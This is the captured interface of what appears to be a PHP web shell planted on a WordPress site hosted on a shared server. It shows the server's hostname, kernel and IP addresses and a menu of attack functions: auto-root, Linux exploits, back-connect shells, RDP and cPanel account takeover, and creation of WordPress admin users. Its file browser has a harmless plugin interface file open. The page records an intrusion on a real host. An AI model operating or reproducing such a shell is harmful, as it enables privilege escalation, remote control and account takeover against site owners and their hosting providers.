Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.119.253.133
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
goldenreviesws.com /
wp-content /
plugins /
copy-delete-posts /
analyst /
src /
Contracts /
[ HOME SHELL ]
Name
Size
Permission
Action
AnalystContract.php
169
B
-rw-r--r--
CacheContract.php
667
B
-rw-r--r--
HttpClientContract.php
404
B
-rw-r--r--
RequestContract.php
339
B
-rw-r--r--
RequestorContract.php
670
B
-rw-r--r--
TrackerContract.php
1.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TrackerContract.php
<?php namespace Analyst\Contracts; interface TrackerContract { /** * Should register activation and deactivation * event hooks * * @return void */ public function registerHooks(); /** * Will fire when admin activates plugin * * @return void */ public function onActivePluginListener(); /** * Will fire when admin deactivates plugin * * @return void */ public function onDeactivatePluginListener(); /** * Will fire when user opted in * * @return void */ public function onOptInListener(); /** * Will fire when user opted out * * @return void */ public function onOptOutListener(); /** * Will fire when user accept opt/in at first time * * @return void */ public function onInstallListener(); /** * Will fire when user skipped installation * * @return void */ public function onSkipInstallListener(); /** * Will fire when user delete plugin through admin panel. * This action will happen if admin at least once * activated the plugin. * * The register_uninstall_hook function accepts only static * function or global function to be executed, so this is * why this method is static * * @return void */ public static function onUninstallPluginListener(); }
Close